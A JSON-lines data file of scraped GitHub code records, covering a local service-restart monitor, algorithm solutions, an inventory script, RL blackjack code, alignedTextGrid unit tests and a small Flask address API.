\"a\") as log_file:\n log_file.write(msg)\n \ndef checkPortStatus(port):\n result = subprocess.getoutput(f\"nc -vz localhost {port}\")\n writeInLogFile(f\"[{getCurrentTime()}] Checking port: {port} ==> {result}\\n\")\n if \"refused\" not in result:\n return True\n else:\n return False\n\ndef checkServiceStatus():\n for i in CHECK_SERVICES:\n if checkPortStatus(CHECK_SERVICES[i][\"port\"]):\n continue\n else:\n command = CHECK_SERVICES[i][\"command\"]\n message = f\"[{getCurrentTime()}] Starting service {i} with command: \\\"{command}\\\" \\n\"\n writeInLogFile(message)\n executeCommande(command)\n # sendNotificationToSlack(message)\n # sendNotificationToDiscord(message)\n \ndef sendNotificationToSlack(message):\n response = postQuery(SLACK_BOT_URL, data=message)\n writeInLogFile(f\"[{getCurrentTime()}] sendNotificationToSlack response: \\\"{response.text}\\\" \\n\")\n\ndef sendNotificationToDiscord(message):\n response = postQuery(DISCORD_WEBHOOKS, data=message)\n writeInLogFile(f\"[{getCurrentTime()}] sendNotificationToDiscord response: \\\"{response.text}\\\" \\n\")\n \nif __name__ == \"__main__\":\n try:\n checkServiceStatus()\n except Exception as e:\n writeInLogFile(f\"Error: 
{str(e)}\\n\")","repo_name":"shadoworker5/Cyber-security-code","sub_path":"services_auto_start.py","file_name":"services_auto_start.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"12287714901","text":"# Recursive\nclass Solution:\n def closestValue(self, root, target):\n \"\"\"\n :type root: TreeNode\n :type target: float\n :rtype: int\n \"\"\"\n self.closest = float('inf')\n \n def helper(root, value):\n if not root:\n return\n if abs(root.val - target) < abs(self.closest - target):\n self.closest = root.val\n \n # Target should be located on left subtree\n if target < root.val:\n helper(root.left, target)\n \n # target should be located on right subtree\n if target > root.val:\n helper(root.right, target)\n \n helper(root, target)\n return self.closest\n\n# Iterative\nclass Solution(object):\n def closestValue(self, root, target):\n closest = root.val\n while root:\n if abs(root.val - target) < abs(closest - target):\n closest = root.val\n root = root.left if target < root.val else root.right\n return closest\n\n# > Time Complexity O(N)\n# > Space Complexity O(1)\n","repo_name":"neo4u/neophyte","sub_path":"google/closest_bst_value.py","file_name":"closest_bst_value.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"19665233438","text":"import json as j\r\n\r\n\r\nclass InventoryItem:\r\n \r\n def __init__(self, itemName):\r\n self.name = itemName\r\n self.totalStocked = 0\r\n self.totalInStock = 0\r\n self.totalSlots = 0\r\n \r\n def addToStocked (self, stockAmt ):\r\n self.totalStocked = self.totalStocked + stockAmt\r\n \r\n def addToInStock (self, inStockAmt):\r\n self.totalInStock = self.totalInStock + inStockAmt\r\n \r\n def incrementSlots(self):\r\n self.totalSlots = self.totalSlots + 1\r\n \r\n def __repr__(self):\r\n return '{} In Stock: {}, Stocked: {}, Slots: {}'.format(self.name,self.totalInStock, self.totalStocked, self.totalSlots)\r\n \r\n def getNumSold(self):\r\n return self.totalStocked - self.totalInStock\r\n \r\n def getSoldPct(self):\r\n return self.getNumSold() / self.totalStocked\r\n \r\n def getStockNeed(self):\r\n return 8 * self.totalSlots - self.totalInStock\r\n \r\n def getName(self):\r\n return self.name\r\n \r\n def getNumInStock(self):\r\n return self.totalInStock\r\n \r\ndef main():\r\n itemNameToInventoryItem = {}\r\n inventoryFileNames = \"REID_1F_20171004.json\",\"REID_2F_20171004.json\",\"REID_3F_20171004.json\"\r\n for inventoryFileName in inventoryFileNames:\r\n inventoryFile = open(inventoryFileName, 'r')\r\n\r\n inventoryData = j.loads(inventoryFile.read())\r\n print(inventoryData['machine_label'])\r\n print(inventoryData['machine_id'])\r\n\r\n contents = inventoryData['contents']\r\n\r\n for row in contents:\r\n #print(row['row'])\r\n for slot in row['slots']:\r\n #searches inventoryItem to see if avail, if not creates.\r\n itemName = slot['item_name']\r\n inventoryItem = itemNameToInventoryItem.get(itemName, InventoryItem(itemName))\r\n \r\n inventoryItem.addToStocked(slot['last_stock'])\r\n inventoryItem.addToInStock(slot['current_stock'])\r\n inventoryItem.incrementSlots();\r\n #store item\r\n itemNameToInventoryItem[itemName] = inventoryItem\r\n cokeItem = itemNameToInventoryItem['Coke']\r\n \r\n print(cokeItem)\r\n print(cokeItem.getNumSold())\r\n print(cokeItem.getSoldPct() * 100 )\r\n print(cokeItem.getStockNeed())\r\n \r\n sortChoice 
= ''\r\n inventoryItemsList = list(itemNameToInventoryItem.values() )\r\n while sortChoice != 'q':\r\n sortChoice = input(\"Sort by (n)ame, (p)ct sold, (s)tocking need, or (q) to quit: \")\r\n if sortChoice == 'n':\r\n inventoryItemsList.sort(key = InventoryItem.getName)\r\n elif sortChoice == 'p':\r\n inventoryItemsList.sort(key = InventoryItem.getSoldPct)\r\n inventoryItemsList.reverse()\r\n elif sortChoice == 's':\r\n inventoryItemsList.sort(key = InventoryItem.getStockNeed)\r\n inventoryItemsList.reverse()\r\n \r\n print('Item Name Sold % Sold In Stock Stock needs ')\r\n \r\n for item in inventoryItemsList:\r\n print('{:20} {:8} {:8.2f}% {:8} {:8}'.format(item.getName(), item.getNumSold(), item.getSoldPct() * 100, item.getNumInStock(), item.getStockNeed()))\r\n print()\r\nmain()","repo_name":"MrMace/PythonProjects","sub_path":"vendingInventory.py","file_name":"vendingInventory.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42171710381","text":"from test_ella.cases import RedisTestCase as TestCase\n\nfrom ella.api import object_serializer, FULL\nfrom ella.core.models import Publishable\nfrom ella.articles.models import Article\n\nfrom nose import tools\n\nclass TestObjectSerialization(TestCase):\n def setUp(self):\n super(TestObjectSerialization, self).setUp()\n self.old_registry = object_serializer._registry\n object_serializer._registry = {}\n\n def tearDown(self):\n super(TestObjectSerialization, self).tearDown()\n object_serializer._registry = self.old_registry\n\n def test_article_is_properly_serialized(self):\n object_serializer.register(Publishable, lambda r, a: 'Publishable %s' % a.id)\n object_serializer.register(Article, lambda r, a: 'Article %s' % a.id, FULL)\n art = Article(id=42)\n tools.assert_equals('Publishable 42', object_serializer.serialize(None, art))\n\n","repo_name":"ella/ella","sub_path":"test_ella/test_api/test_serialization.py","file_name":"test_serialization.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"76"} +{"seq_id":"43858835202","text":"import numpy as np\nfrom tqdm import tqdm\nfrom os.path import join\n\nfrom env import InitState, Step, StateToCoord, IsTerminalState\nfrom env import range_dealer, range_player\nfrom plot import Print2DFunction\nfrom policy import MyPolicy\nn0=20\ndebug = False\niteration = 50000 if debug else 500000\n\n\ndef GenerateEpisode(Q, history):\n # since discount factor is 1\n # and immediate return is always 0 unless the game terminates\n # each return value of intermediate step is equal to the reward of the final state\n # this function will generate [, , ..., ], final_reward \n episode = []\n final_reward = 0\n state = InitState()\n action = MyPolicy(state, Q, history, n0=n0)\n episode.append((state, action))\n while True:\n state, reward = Step(state, action)\n if IsTerminalState(state):\n final_reward = reward\n action = None\n episode.append((state, action))\n break\n else:\n action = MyPolicy(state, Q, history)\n episode.append((state, action))\n \n return episode, final_reward\n\n# Monte-Carlo learning\ndef UpdateQ_MC(Q, simulation, history):\n episode, final_reward = simulation\n for s, a in episode:\n if IsTerminalState(s):\n continue\n \n x, y = StateToCoord(s)\n history[x, y, a] += 1\n # learning rate\n lr = 1 / history[x, y, a]\n Q[x, y, a] += lr * (final_reward - Q[x, y, a])\n '''\n if debug and y == 20 and x == 5 and 
a== 0:\n visit_time = np.sum(history[x, y, :])\n epsilon = n0 / (n0 + visit_time)\n print('Q: {:.2f}\\t return: {}\\t lr: {:.2f} \\t epsilon: {:.2f}'.format(Q[x, y, a], final_reward, lr, epsilon))\n '''\ndef OptimizeQValue(Q):\n # count of visit times for each state \n history = np.zeros(shape=[10, 21, 2])\n if debug:\n generator = range(iteration)\n else:\n generator = tqdm(range(iteration))\n for _ in generator:\n simulation = GenerateEpisode(Q, history)\n UpdateQ_MC(Q, simulation, history)\n return Q\n \ndef GetQvalue():\n Q = np.zeros(shape=[10, 21, 2])\n Q = OptimizeQValue(Q)\n return Q\n \ndef GetFilePath(name):\n name = name.replace(' ', '_')\n path = join('results', name + '.png')\n return path\n \ndef Section2_Monte_Carlo_Control():\n Q = GetQvalue()\n V = np.max(Q, axis=-1)\n name_V = 'Qstar'\n path_V = GetFilePath(name_V)\n Print2DFunction(V, range_dealer, range_player, title=name_V, path=path_V)\n\nif __name__=='__main__':\n Section2_Monte_Carlo_Control()\n \n ","repo_name":"Ao-Lee/Reinforcement-Learning-David-Silver-Solution","sub_path":"MC_Control.py","file_name":"MC_Control.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"76"} +{"seq_id":"2900588610","text":"command = input()\nnotes = [0] * 10\n\nwhile command != \"End\":\n tokens = command.split(\"-\")\n priority = int(tokens[0]) - 1\n note = tokens[1]\n notes.pop(priority)\n notes.insert(priority, note)\n\n command = input()\nresult = [x for x in notes if x != 0]\nprint(result)\n","repo_name":"AsenAsenov1/SoftUni-Programming-Fundamentals-with-Python-September-2022","sub_path":"13_lists_advanced_lab/3_to_do_list.py","file_name":"3_to_do_list.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"5443714611","text":" # ejemplo 1\nnombres =[ 'Pedro', 'Josue', 'Justin']\n\n\n# for in\nfor nombre in nombres:\n print(nombre)\n \n \n # ejemplo 2\n \nDj= ['Jonas', 'Tiesto','david', 'allan', 'Martin', 'Marsmello' ]\n\nfor djs in Dj :\n print(djs)\n \n \n \n # ejemplo 3\n \n clientes = [ 'Renato ', 'renzo', 'Jorge', 'Pedro', 'Balvin']\n \n for cliente in clientes :\n print(cliente)# \n \n \n \n # ejemplo 4\n \n \n users = ['cliente-1', 'Cliente-2','cliente-3', 'Cliente-4','cliente-5', 'Cliente-6']\n \n #uso de for in in\n \n for user in users :\n print(user)\n \n \n \n","repo_name":"Julio-73/Course-Python","sub_path":"for/ejercicio38.py","file_name":"ejercicio38.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"3854583660","text":"import pytest\nfrom aligned_textgrid.sequences.sequences import *\nfrom aligned_textgrid.sequences.tiers import *\nimport numpy as np\nfrom praatio.utilities.constants import Interval\n\nclass TestSequenceIntervalDefault:\n \"\"\"_Test default behavior of SequenceInterval_\n \"\"\"\n seq_int = SequenceInterval()\n class SampleClassI(SequenceInterval):\n def __init__(\n self, \n Interval = Interval(None, None, None)\n ):\n super().__init__(Interval = Interval)\n\n def test_default_class(self):\n assert self.seq_int.__class__ is SequenceInterval\n \n def test_default_super_class(self):\n assert self.seq_int.superset_class is Top\n \n def test_default_subset_class(self):\n assert self.seq_int.subset_class is Bottom\n \n def test_default_super_instance(self):\n assert self.seq_int.super_instance is None\n\n def 
test_default_subset_list(self):\n assert type(self.seq_int.subset_list) is list\n assert len(self.seq_int.subset_list) == 0\n\n def test_default_sub_starts(self):\n assert type(self.seq_int.sub_starts) is np.ndarray\n assert len(self.seq_int.sub_starts) == 0\n\n def test_default_sub_ends(self):\n assert type(self.seq_int.sub_ends) is np.ndarray\n assert len(self.seq_int.sub_ends) == 0\n \n def test_default_sub_labels(self):\n assert type(self.seq_int.sub_labels) is list\n assert len(self.seq_int.sub_labels) == 0\n\n def test_default_intervalinfo(self):\n assert self.seq_int.start is None\n assert self.seq_int.end is None\n assert self.seq_int.label is None\n\n def test_default_fol(self):\n assert self.seq_int.fol.label == \"#\"\n\n def test_default_prev(self):\n assert self.seq_int.fol.label == \"#\"\n\n def test_default_super_strictness(self):\n local_sample = self.SampleClassI()\n with pytest.raises(Exception):\n self.seq_int.set_super_instance(local_sample)\n\n def test_default_sub_strictness(self):\n local_sample = self.SampleClassI()\n with pytest.raises(Exception):\n self.seq_int.append_subset_list(local_sample)\n \n def test_default_intier(self):\n local_sample = self.SampleClassI()\n assert local_sample.intier is None\n \n def test_default_tieridx(self):\n local_sample = self.SampleClassI()\n assert local_sample.tier_index is None\n\n def test_defaul_getby(self):\n local_sample = self.SampleClassI()\n assert local_sample.get_tierwise(1) is None\n\nclass TestSuperSubClassSetting:\n class LocalClassA(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)):\n super().__init__(Interval = Interval)\n\n class LocalClassB(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)):\n super().__init__(Interval = Interval)\n\n pre_instanceA = LocalClassA()\n pre_instanceB = LocalClassB() \n\n def test_presetting(self):\n assert self.pre_instanceA.superset_class is Top\n assert self.pre_instanceA.subset_class is Bottom\n assert self.pre_instanceB.superset_class is Top\n assert self.pre_instanceB.subset_class is Bottom\n\n def test_presetting_instances(self):\n with pytest.raises(Exception):\n self.pre_instanceB.set_super_instance(self.pre_instanceA)\n \n with pytest.raises(Exception):\n self.pre_instanceA.append_subset_list(self.pre_instanceB)\n\n def test_bad_super_setting(self):\n with pytest.raises(Exception):\n self.LocalClassA.set_superset_class(\"B\")\n \n with pytest.raises(Exception):\n self.LocalClassA.set_superset_class(self.LocalClassA)\n \n self.LocalClassA.set_superset_class()\n \n def test_bad_sub_setting(self):\n with pytest.raises(Exception):\n self.LocalClassA.set_subset_class(\"B\")\n \n with pytest.raises(Exception):\n self.LocalClassA.set_subset_class(self.LocalClassA)\n\n self.LocalClassA.set_subset_class()\n\n def test_none_setting(self):\n new_instanceA = self.LocalClassA()\n\n try:\n new_instanceA.set_super_instance()\n except:\n assert False \n\n def test_super_setting(self):\n self.LocalClassA.set_superset_class(self.LocalClassB)\n new_instanceA = self.LocalClassA()\n new_instanceB = self.LocalClassB()\n assert self.pre_instanceA.superset_class is self.LocalClassB\n assert new_instanceA.superset_class is self.LocalClassB\n\n assert self.pre_instanceB.subset_class is self.LocalClassA\n assert new_instanceB.subset_class is self.LocalClassA\n\n\n def test_postsetting_instances(self):\n try:\n self.pre_instanceA.set_super_instance(self.pre_instanceB)\n except Exception as exc:\n assert False, 
f\"{exc}\"\n\n assert self.pre_instanceA.super_instance is self.pre_instanceB\n assert self.pre_instanceA in self.pre_instanceB.subset_list\n\nclass TestPrecedence:\n class LocalClassA(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)):\n super().__init__(Interval = Interval)\n\n class LocalClassB(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)):\n super().__init__(Interval = Interval)\n \n def test_fol_prev_success(self):\n A1 = self.LocalClassA()\n A2 = self.LocalClassA()\n\n with pytest.raises(Exception):\n A1.set_fol(A1)\n\n with pytest.raises(Exception):\n A1.set_prev(A1)\n\n try:\n A1.set_fol(A2)\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert A1.fol is A2\n assert A2.prev is A1\n\n try: \n A1.set_prev(A2)\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert A1.prev is A2\n assert A2.fol is A1\n \n def test_fol_prev_exception(self):\n A1 = self.LocalClassA()\n B2 = self.LocalClassB()\n\n with pytest.raises(Exception):\n A1.set_fol(B2)\n\n with pytest.raises(Exception):\n A1.set_prev(B2)\n\nclass TestHierarchy:\n\n class UpperClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n class LowerClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n UpperClass.set_subset_class(LowerClass)\n\n def test_super_instance(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n lower2 = self.LowerClass(Interval(5,10,\"lower2\"))\n\n try:\n lower1.set_super_instance(upper1)\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert lower1.super_instance is upper1\n assert lower1 in upper1\n\n try:\n lower2.set_super_instance(upper1)\n except Exception as exc:\n assert False, f\"{exc}\"\n\n assert lower2.super_instance is upper1\n assert lower2 in upper1\n\n assert lower1.fol is lower2\n assert lower2.prev is lower1\n\n def test_subset_instance(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n lower2 = self.LowerClass(Interval(5,10,\"lower2\"))\n\n try:\n upper1.append_subset_list(lower1)\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert lower1.super_instance is upper1\n assert lower1 in upper1\n\n try:\n upper1.set_subset_list([lower2, lower1])\n except Exception as exc:\n assert False, f\"{exc}\"\n \n assert lower1.super_instance is upper1\n assert lower1 in upper1\n assert lower2.super_instance is upper1\n assert lower2 in upper1\n assert lower1.fol is lower2\n assert lower2.prev is lower1\n\n def test_subset_index(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n lower2 = self.LowerClass(Interval(5,10,\"lower2\"))\n lower3 = self.LowerClass(Interval(5,10,\"lower2\"))\n\n upper1.set_subset_list([lower1, lower2])\n\n assert upper1.index(lower1) == 0\n assert upper1.index(lower2) == 1\n\n with pytest.raises(ValueError):\n _ = upper1.index(lower3)\n\n def test_subset_pop(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n lower2 = self.LowerClass(Interval(5,10,\"lower2\"))\n lower3 = self.LowerClass(Interval(5,10,\"lower2\"))\n\n upper1.set_subset_list([lower1, lower2, lower3])\n\n assert len(upper1) == 3\n assert lower3 in upper1\n assert 
lower3.fol.label == \"#\"\n assert lower2.fol is lower3\n\n upper1.pop(lower3)\n assert len(upper1) == 2\n assert not lower3 in upper1\n assert lower2.fol.label == \"#\"\n assert not lower2.fol is lower3\n\n upper1.set_subset_list([lower1, lower2, lower3])\n\n upper1.pop(lower2)\n assert lower1.fol is lower3\n assert lower3.prev is lower1\n\n\n\n def test_hierarchy_strictness(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n\n with pytest.raises(Exception):\n upper1.set_super_instance(lower1)\n \n with pytest.raises(Exception):\n lower1.append_subset_list(upper1)\n \n with pytest.raises(Exception):\n lower1.set_super_instance(lower1)\n \n with pytest.raises(Exception):\n lower1.append_subset_list(lower1)\n\n def test_validation(self):\n upper1 = self.UpperClass(Interval(0,10,\"upper\"))\n lower1 = self.LowerClass(Interval(0,5,\"lower1\"))\n gap = self.LowerClass(Interval(6,10,\"gap\"))\n overlap = self.LowerClass(Interval(4,10,\"overlap\"))\n snug = self.LowerClass(Interval(5,10,\"snug\"))\n\n upper1.set_subset_list([lower1, snug])\n assert upper1.validate()\n\n upper1.set_subset_list([lower1, gap])\n assert not upper1.validate()\n\n upper1.set_subset_list([lower1, overlap])\n assert not upper1.validate()\n\nclass TestIteration:\n class UpperClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n class LowerClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n UpperClass.set_subset_class(LowerClass)\n\n def test_iter(self):\n upper1 = self.UpperClass(Interval(0, 10, \"one\"))\n for x in range(10):\n upper1.append_subset_list(\n self.LowerClass(Interval(x, x+1, str(x)))\n )\n\n try:\n for item in upper1:\n pass\n except Exception as exc:\n assert False, f\"{exc}\"\n \n labels = [x.label for x in upper1]\n assert len(labels) == 10\n\nclass TestGetLenIn:\n class UpperClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n class LowerClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n UpperClass.set_subset_class(LowerClass)\n upper1 = UpperClass(Interval(0, 10, \"upper\"))\n\n lower1 = LowerClass(Interval=Interval(0,3,\"lower1\"))\n lower2 = LowerClass(Interval=Interval(3,8,\"lower2\")) \n lower3 = LowerClass(Interval=Interval(8,10,\"lower3\"))\n lower4 = LowerClass(Interval=Interval(10,11,\"lower4\"))\n upper1.set_subset_list([lower1, lower2, lower3])\n\n def test_in(self):\n assert self.lower1 in self.upper1\n assert not self.lower4 in self.upper1\n\n def test_get(self):\n assert self.lower1 is self.upper1[0]\n for a,b in zip([self.lower2, self.lower3], self.upper1[1:3]):\n assert a is b\n with pytest.raises(IndexError):\n _ = self.upper1[4]\n \n def test_len(self):\n assert len(self.upper1) == 3\n\nclass TestSetFeature:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n sample_obj = SampleClass(Interval=Interval(0, 10, \"sample\"))\n\n def test_set_feature(self):\n self.sample_obj.set_feature(\"new_feat\", 5)\n assert self.sample_obj.new_feat == 5\n\n self.sample_obj.new_feat = \"A\"\n assert self.sample_obj.new_feat == \"A\"\n\nclass TestReturnInterval:\n class SampleClass(SequenceInterval):\n 
def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n sample_obj = SampleClass(Interval=Interval(0, 10, \"sample\"))\n\n def test_return_interval_class(self):\n out_interval = self.sample_obj.return_interval()\n assert out_interval.__class__ is Interval\n def test_return_interval_values(self):\n out_interval = self.sample_obj.return_interval()\n assert out_interval.start == 0\n assert out_interval.end == 10\n assert out_interval.label == \"sample\"\n\nclass TestFusion:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n class Upper(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n \n class Lower(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n Lower.set_superset_class(Upper) \n\n def test_rightwards_simple(self):\n fuser = self.SampleClass(Interval(0,1,\"one\"))\n fusee = self.SampleClass(Interval(1, 2, \"two\"))\n fuser.set_fol(fusee)\n\n try:\n fuser.fuse_rightwards()\n except:\n assert False\n \n assert fuser.label == \"one two\"\n assert fuser.end == 2\n\n with pytest.raises(Exception):\n fuser.fuse_rightwards()\n\n def test_leftwards_simple(self):\n fusee = self.SampleClass(Interval(0,1,\"one\"))\n fuser = self.SampleClass(Interval(1, 2, \"two\"))\n fuser.set_prev(fusee)\n\n try:\n fuser.fuse_leftwards()\n except:\n assert False\n \n assert fuser.label == \"one two\"\n assert fuser.start == 0\n\n with pytest.raises(Exception):\n fuser.fuse_leftwards()\n\n def test_rightwards_hierarchy(self):\n upper1 = self.Upper(Interval(0,5, \"upper1\"))\n upper2 = self.Upper(Interval(5,10, \"upper2\"))\n lower1 = self.Lower(Interval(0,1, \"lower1\"))\n lower2 = self.Lower(Interval(1,5, \"lower2\"))\n lower3 = self.Lower(Interval(5,6, \"lower3\"))\n lower4 = self.Lower(Interval(6,10, \"lower3\"))\n\n upper1.set_subset_list([lower1, lower2])\n upper2.set_subset_list([lower3, lower4])\n upper1.set_fol(upper2)\n\n assert len(upper1) == 2\n assert lower2 in upper1\n assert lower1.fol is lower2\n try:\n lower1.fuse_rightwards()\n except:\n assert False\n\n assert len(upper1) == 1\n assert not lower2 in upper1\n assert lower1.fol.label == \"#\"\n\n assert not lower3 in upper1\n\n upper1.fuse_rightwards()\n\n assert len(upper1) == 3\n assert lower3 in upper1\n assert lower1.fol is lower3\n\n def test_leftwards_hierarchy(self):\n upper1 = self.Upper(Interval(0,5, \"upper1\"))\n upper2 = self.Upper(Interval(5,10, \"upper2\"))\n lower1 = self.Lower(Interval(0,1, \"lower1\"))\n lower2 = self.Lower(Interval(1,5, \"lower2\"))\n lower3 = self.Lower(Interval(5,6, \"lower3\"))\n lower4 = self.Lower(Interval(6,10, \"lower3\"))\n\n upper1.set_subset_list([lower1, lower2])\n upper2.set_subset_list([lower3, lower4])\n upper1.set_fol(upper2)\n\n assert len(upper1) == 2\n assert lower2 in upper1\n assert lower1.fol is lower2\n try:\n lower2.fuse_leftwards()\n except:\n assert False\n\n assert len(upper1) == 1\n assert not lower1 in upper1\n assert lower2.prev.label == \"#\"\n\n assert not lower2 in upper2\n\n upper2.fuse_leftwards()\n\n assert len(upper2) == 3\n assert lower2 in upper2\n assert lower3.prev is lower2\n\n def test_rightward_tier(self):\n tier1 = SequenceTier(tier = [\n Interval(0, 5, \"upper1\"),\n Interval(5, 10, \"upper2\")\n ],\n entry_class=self.Upper)\n tier2 = SequenceTier(tier = [\n 
Interval(0, 2, \"lower1\"),\n Interval(2, 5, \"lower2\"),\n Interval(5, 7, \"lower3\"),\n Interval(7, 10, \"lower4\")\n ],\n entry_class=self.Lower)\n\n rt = TierGroup(tiers=[tier1, tier2])\n assert len(rt[0]) == 2\n assert len(rt[1]) == 4\n\n assert len(rt[0][0]) == 2\n assert rt[1][1].fol.label == \"#\"\n\n third_lower = rt[1][2]\n\n assert third_lower.tier_index == 2\n \n rt[1][0].fuse_rightwards()\n\n assert len(rt[0]) == 2\n assert len(rt[1]) == 3\n\n assert len(rt[0][0]) == 1\n assert rt[1][0].fol.label == \"#\"\n\n assert third_lower.tier_index == 1\n\n with pytest.raises(Exception):\n rt[1][0].fuse_rightwards()\n \n rt[0][0].fuse_rightwards()\n assert len(rt[0]) == 1\n assert len(rt[1]) == 3\n\n assert rt[0][0].fol.label == \"#\"\n\n try:\n rt[1][0].fuse_rightwards()\n except:\n assert False\n\n def test_leftward_tier(self):\n tier1 = SequenceTier(tier = [\n Interval(0, 5, \"upper1\"),\n Interval(5, 10, \"upper2\")\n ],\n entry_class=self.Upper)\n tier2 = SequenceTier(tier = [\n Interval(0, 2, \"lower1\"),\n Interval(2, 5, \"lower2\"),\n Interval(5, 7, \"lower3\"),\n Interval(7, 10, \"lower4\")\n ],\n entry_class=self.Lower)\n\n rt = TierGroup(tiers=[tier1, tier2])\n assert len(rt[0]) == 2\n assert len(rt[1]) == 4\n\n assert len(rt[0][0]) == 2\n assert rt[1][0].prev.label == \"#\"\n\n third_lower = rt[1][2]\n\n assert third_lower.tier_index == 2\n \n rt[1][1].fuse_leftwards()\n\n assert len(rt[0]) == 2\n assert len(rt[1]) == 3\n\n assert len(rt[0][0]) == 1\n assert rt[1][0].prev.label == \"#\"\n\n assert third_lower.tier_index == 1\n\n with pytest.raises(Exception):\n rt[1][0].fuse_leftwards()\n \n rt[0][1].fuse_leftwards()\n assert len(rt[0]) == 1\n assert len(rt[1]) == 3\n\n assert rt[0][0].fol.label == \"#\"\n\n try:\n rt[1][1].fuse_leftwards()\n except:\n assert False\nclass TestTop:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n sample_obj = SampleClass(Interval=Interval(1,2, \"sample\"))\n\n def test_top_default(self):\n assert Top.superset_class is None\n\n def test_top_insensitivity(self):\n Top.set_superset_class(self.SampleClass)\n assert Top.superset_class is None\n\n def test_no_top_superinstance(self):\n with pytest.raises(Exception):\n t = Top()\n t.set_super_instance(self.sample_obj)\n\nclass TextBottom:\n class SampleClass(SequenceInterval):\n def __init__(\n self, \n Interval: Interval = Interval(None, None, None)\n ):\n super().__init__(Interval)\n\n sample_obj = SampleClass(Interval=Interval(1,2, \"sample\"))\n\n def test_bottom_default(self):\n assert Bottom.subset_class is None\n \n def test_bottom_insensitivity(self):\n Bottom.set_subset_class(self.SampleClass)\n assert Bottom.subset_class is None\n\n def test_bottom_no_append_subset(self):\n b = Bottom()\n with pytest.raises(Exception):\n b.append_subset_list(self.sample_obj)\n\n def test_bottom_no_set_subset(self):\n b = Bottom()\n with pytest.raises(Exception):\n b.set_subset_list([self.sample_obj])\n","repo_name":"Forced-Alignment-and-Vowel-Extraction/alignedTextGrid","sub_path":"tests/test_sequences/test_sequences.py","file_name":"test_sequences.py","file_ext":"py","file_size_in_byte":21470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"19015219291","text":"from flask import Flask, jsonify, request\r\napp = Flask(__name__)\r\n\r\naddresses = [\r\n{\r\n'location' : '56.844494, 60.653655',\r\n'name' : 'URFU'\r\n},\r\n{\r\n'location' : 
'56.840469, 60.597754',\r\n'name' : 'Theather'\r\n}, \r\n{\r\n'location' : '56.837956, 60.596268',\r\n'name' : 'Square'\r\n}]\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n return jsonify({'message' : \"hello\"})\r\n\r\n@app.route('/addr', methods=['GET'])\r\ndef returnAll():\r\n return jsonify({'addresses' : addresses})\r\n\r\n@app.route('/addr/', methods=['GET'])\r\ndef returnOne(location):\r\n\taddr = [address for address in addresses if address['location'] == location]\r\n\treturn jsonify({'address' : addr[0]})\r\n\r\n@app.route('/addr', methods=['POST'])\r\ndef addOne():\r\n\taddress = {'location' : request.json['location']}\r\n\r\n\taddresses.append(address)\r\n\treturn jsonify({'adresses' : addresses})\r\n\r\n\r\n@app.route('/addr', methods=['PUT'])\r\ndef editOne(location):\r\n\taddr = [address for address in adresses if address['location'] == location]\r\n\taddr[0]['location'] = request.json['location']\r\n\treturn jsonify({'address' : addr[0]})\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, 